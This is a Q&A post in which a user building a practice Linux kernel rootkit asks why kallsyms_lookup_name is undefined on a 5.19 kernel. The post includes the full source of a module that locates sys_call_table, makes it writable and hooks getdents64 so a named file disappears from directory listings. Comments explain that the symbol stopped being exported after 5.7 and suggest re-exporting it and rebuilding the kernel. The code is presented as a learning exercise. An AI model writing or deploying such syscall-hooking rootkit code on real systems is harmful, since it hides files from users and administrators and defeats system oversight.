# modpost: kallsyms_lookup_name is undefined

Tags: c, linux-kernel, rootkit

I am doing a simple exercise of writing rootkit on 5.19.0-38-generic kernal
i try to access the location of the sys call table with kallsyms_lookup_name

when i "make: the module this is the result:

> MODPOST /home/johnny/rootkit/system_call_hooking/Module.symversERROR: modpost: "kallsyms_lookup_name" [/home/johnny/rootkit/system_call_hooking/sys_hook.ko] undefined!make[2]: *** [scripts/Makefile.modpost:128: /home/johnny/rootkit/system_call_hooking/Module.symvers] Error 1make[1]: *** [Makefile:1764: modules] Error 2make[1]: Leaving directory '/usr/src/linux-headers-5.19.0-38-generic'make: *** [Makefile:5: all] Error 2

the source code:

```
#include <linux/init.h>
#include <linux/kernel.h>
#include <linux/moduleparam.h>
#include <linux/unistd.h>
#include <linux/semaphore.h>
#include <linux/dirent.h>
#include <asm/cacheflush.h>
#include <linux/kallsyms.h>
#include <linux/syscalls.h>


MODULE_DESCRIPTION("Hide a file from getdents syscalls");
MODULE_LICENSE("GPL");

void **sys_call_table;

#define FILE_NAME "thisisatestfile.txt"

asmlinkage int (*original_getdents64) (unsigned int fd, struct linux_dirent64 *dirp, unsigned int count);

asmlinkage int sys_getdents64_hook(unsigned int fd, struct linux_dirent64 *dirp, unsigned int count)
{
        int rtn;
        struct linux_dirent64 *cur = dirp;
        int i = 0;
        rtn = original_getdents64(fd, dirp, count);
        while (i < rtn) {
                if (strncmp(cur->d_name, FILE_NAME, strlen(FILE_NAME)) == 0) {
                        int reclen = cur->d_reclen;
                        char *next_rec = (char *)cur + reclen;
                        int len = (int)dirp + rtn - (int)next_rec;
                        memmove(cur, next_rec, len);
                        rtn -= reclen;
                        continue;
                }
                i += cur->d_reclen;
                cur = (struct linux_dirent64*) ((char*)dirp + i);
        }
        return rtn;
}

int set_page_rw(unsigned long addr)
{
    unsigned int level;
    pte_t *pte = lookup_address(addr, &level);
    if (pte->pte &~ _PAGE_RW) pte->pte |= _PAGE_RW;
    return 0;
}

int set_page_ro(unsigned long addr)
{
    unsigned int level;
    pte_t *pte = lookup_address(addr, &level);
    pte->pte = pte->pte &~_PAGE_RW;
    return 0;
}

static int __init getdents_hook_init(void)
{

    sys_call_table = (void**) kallsyms_lookup_name("sys_call_table");
    original_getdents64 = sys_call_table[__NR_getdents64];

    set_page_rw(sys_call_table);
    sys_call_table[__NR_getdents64] = sys_getdents64_hook;
        return 0;
}

static void __exit getdents_hook_exit(void)
{
    sys_call_table[__NR_getdents64] = original_getdents64;
    set_page_ro(sys_call_table);
        
}

module_init(getdents_hook_init);
module_exit(getdents_hook_exit);
```

the make file:

> ```
> obj-m += sys_hook.o
> all:
>         make -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules
>
> clean:
>         make -C /lib/modules/$(shell uname -r)/build M=$(PWD) clean
> ```

Comment: `kallsyms_lookup_name` and `kallsyms_on_each_symbol` have not been exported to modules since kernel version 5.7. See [commit 0bd476e6c67190b5eb7b6e105c8db8ff61103281](https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=0bd476e6c67190b5eb7b6e105c8db8ff61103281)

Comment: my kernel version is 5.19.0-38-generic is that higher than 5.7 ?

Comment: The version numbers do not follow the rules of decimal arithmetic. The '.'s separate individual components of the version number. So 5.7 is not the same version as 5.70. version 5.7 is lower than version 5.19 which is lower than 5.70 (which does not actually exist as a Linux kernel version).

Comment: Does this answer your question? [kallsyms\_lookup\_name undefined error in 5.10.0-kali7-amd64](https://stackoverflow.com/questions/67551576/kallsyms-lookup-name-undefined-error-in-5-10-0-kali7-amd64)

Comment: For your own use you can simply add the EXPORT_SYMBOL lines and rebuild the kernel.